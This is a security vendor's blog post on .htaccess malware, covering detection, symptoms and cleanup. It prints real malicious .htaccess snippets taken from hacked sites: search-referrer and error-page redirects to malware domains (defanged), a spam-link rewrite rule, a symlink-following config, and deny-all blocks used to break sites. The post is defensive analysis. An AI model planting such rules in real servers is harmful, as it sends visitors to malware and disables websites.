What is .htaccess Malware? (Detection, Symptoms & Prevention)

  • March 15, 2024
What is htaccess malware

The .htaccess file is notorious for being targeted by attackers. Whether it’s using the file to hide malware, redirect search engines to other sites with black hat SEO tactics, or inject content — the range of possibilities for misuse is vast, making it a prime target for hackers.

.htaccess malware can be hard to pinpoint and clean up since it allows an attacker to make multiple changes to the web server and its behavior. Furthermore, many site owners are unaware of this file due to it starting with a “.” (which makes it a hidden file). However, understanding the intricacies of the .htaccess file and its potential misuse is crucial for mitigating risk to your website. The stealthy nature of .htaccess malware, coupled with its ability to manipulate server behavior, makes it a silent yet potent threat.

In this post, we’ll explain what an .htaccess file is and why it’s such an attractive target for attackers. We’ll also cover some common examples of .htaccess malware and how to detect and respond to these threats to help protect your website and visitors.

Contents:

What is an .htaccess file?

The .htaccess file is a very versatile and powerful file specific to Apache server environments. It allows web administrators to make changes to the environment as a whole, or, on a per-directory basis. It can allow or deny access to certain IP addresses, referrers, and user agents.

It is also used to enable things like “pretty permalinks” in WordPress environments with the use of mod_rewrite. It is a very flexible and useful file — and that’s precisely why attackers will misuse this file for their own goals.

Examples of .htaccess malware

Let’s take a look at some common examples of .htaccess malware that you may find if your site has been compromised.

.htaccess redirect malware

One of the more common attacks we’ve encountered is .htaccess redirects. This redirects users from search engines to malware utilizing the following instruction set :

RewriteEngine On

RewriteCond %{HTTP_REFERER} .*google.* [OR]

RewriteCond %{HTTP_REFERER} .*ask.* [OR]

RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]

RewriteCond %{HTTP_REFERER} .*baidu.* [OR]

..

RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]

RewriteCond %{HTTP_REFERER} .*flickr.*

RewriteRule ^(.*)$ hxxp://villusoftreit[.]ru/in.cgi?3 [R=301,L]

This script checks the referrer for anyone visiting the site from the search engines listed, and then proceeds to redirect the user to a page with malware. (I.E. hxxp://villusoftreit[.]ru/in.cgi?3) Website owners are more likely to visit their website by entering the domain directly into their address bar, rather than through a search engine. This makes it less likely that the website owner will notice the infection until they are told about it by someone.

Here’s another example of  an .htaccess redirect:

# BEGIN WordPress

RewriteEngine On

RewriteOptions inherit

RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]

RewriteRule .* hxxp://globalpoweringgatheringon[.]com/in.php?n=30 [R,L]

Another common type of attack involving the .htaccess file is redirecting error pages to malware, which can be even harder to detect. This is because most of the website functions normally. The redirect will only trigger on non-existent pages.

Here’s an example of what you’d find involving this type of attack:

RewriteEngine On

ErrorDocument 400 hxxp://powercrystal[.]ru/inject/index.php

ErrorDocument 401 hxxp://powercrystal[.]ru/inject/index.php

ErrorDocument 403 hxxp://powercrystal[.]ru/inject/index.php

ErrorDocument 404 hxxp://powercrystal[.]ru/inject/index.php

ErrorDocument 500 hxxp://powercrystal[.]ru/inject/index.php

Another example:

ErrorDocument 400 hxxp://arthurlundt.cz[.]cc/ht_er_docs/

ErrorDocument 403 hxxp://arthurlundt.cz[.]cc/ht_er_docs/

[…truncated…]

ErrorDocument 404 hxxp://nicomagen.cz[.]cc/ht_er_docs/

ErrorDocument 405 hxxp://nicomagen.cz[.]cc/ht_er_docs/

.htaccess used to generate spam links

Another way we have seen the .htaccess file abused is through spam link generation:

# BEGIN WordPress

<IfModule mod_rewrite.c>

RewriteEngine On

RewriteRule ^[a-zA-Z0-9_-]+/([0-9]{1,7})([a-zA-Z0-9]{4})[a-zA-Z0-9_-]$ index.php?smsite=$2&smid=$1 [L]

RewriteBase /

RewriteRule ^index\.php$ – [L]

RewriteCond %{REQUEST_FILENAME} !-f

RewriteCond %{REQUEST_FILENAME} !-d

RewriteRule . /index.php [L]

</IfModule>

This malware uses a regular expression that – when coupled with spam malware within the file structure – can generate hundreds of spam links on the website. This will then show up in Google and other search engine search results and harm the website’s SEO.

A very common attack with WHM/cPanel environments is the misuse of symlinks. If symlink protection is disabled within WHM, attackers can use symlinks to move laterally throughout the environment and infect other websites or just create a flood of random spammy symlinks spread across the file structure.

This is made possible in part with the use of an .htaccess file placed in the directory in question:

Options +FollowSymLinks

DirectoryIndex Index.html

Options +Indexes

AddType text/plain .php

AddHandler server-parsed .php

This will instruct the server to follow symlinks to their destination and aid the attackers in spreading their malware throughout the environment.

.htaccess malware to deny access to website files

Another attack that we have seen a lot of recently is the abuse of .htaccess files to deny access to website files. For example, we have seen the attackers litter hundreds, or sometimes thousands of .htaccess files throughout the website file structure with the following:

<FilesMatch ‘.(php|php5|phtml)$’>

Order allow,deny

Deny from all

</FilesMatch>

This is a very simple .htaccess file which does nothing other than prevent PHP execution.

The file can function as a hardening measure when placed in a directory such as ./wp-content/uploads. However, when littered throughout the entire file structure, it can disrupt the functionality of the website and render the wp-admin panel useless. It does this by blocking the website administrator from performing maintenance, updates, or taking down the entire website.

How to check for .htaccess malware on your website

Our free remote website scanner SiteCheck is able to detect many of these .htaccess attacks on your site. Simply enter your URL into the search bar and SiteCheck will scan your site for malicious code.

Remote scanners do have limitations, however. For a complete website scan you’ll also want to scan your website server and database for any suspicious code and indicators of compromise. Learn more about this functionality from our website monitoring page or chat with one of our experienced analysts to discuss implementation.

What to do if you find .htaccess malware

Detected malicious .htaccess behavior or related indicators of compromise? We’ve put together a comprehensive step-by-step guide on how to fix a hacked website.

As a quick recap, you’ll want to do the following if your site has malware:

  1. Analyze and identify all infected website files and components.
  2. Clean the malware from affected files.
  3. Remove malware from your website database.
  4. Check for and remove any website backdoors that may have been planted.
  5. Review user account access and delete unexpected admin users.
  6. Resubmit your site to Google and other search engines if you’ve been blocklisted.
  7. Update your website software including any unpatched CMS, plugins, or themes.
  8. Harden your CMS and install a web application firewall to prevent reinfections.

If you’ve been hacked and you need a hand cleaning up the infection, our experienced security analysts are available 24/7 to help clean up an infection. Reach out — they love to chat!

The best way to prevent an infection in the first place is to proactively implement security measures. That means hardening your website, using strong passwords for all of your accounts, and securing your site against vulnerabilities and threats. Sucuri offers a comprehensive website security service that can help you monitor your site and respond to threats.

Not sure about getting complete website security right now? Try our website firewall free for 30-days and see the results for yourself.

Get help quickly removing malware from your website

Ben Martin is a security analyst and researcher who joined the company in 2013. Ben's main responsibilities include finding new undetected malware, identifying trends in the website security world, and, of course, cleaning websites. His professional experience covers more than a decade of working with infected websites of every variety with a special focus on eCommerce / credit card theft malware. When Ben isn't slaying malware you might find him producing music, gardening, or skateboarding around Victoria.

Related Tags
Related Categories
You May Also Like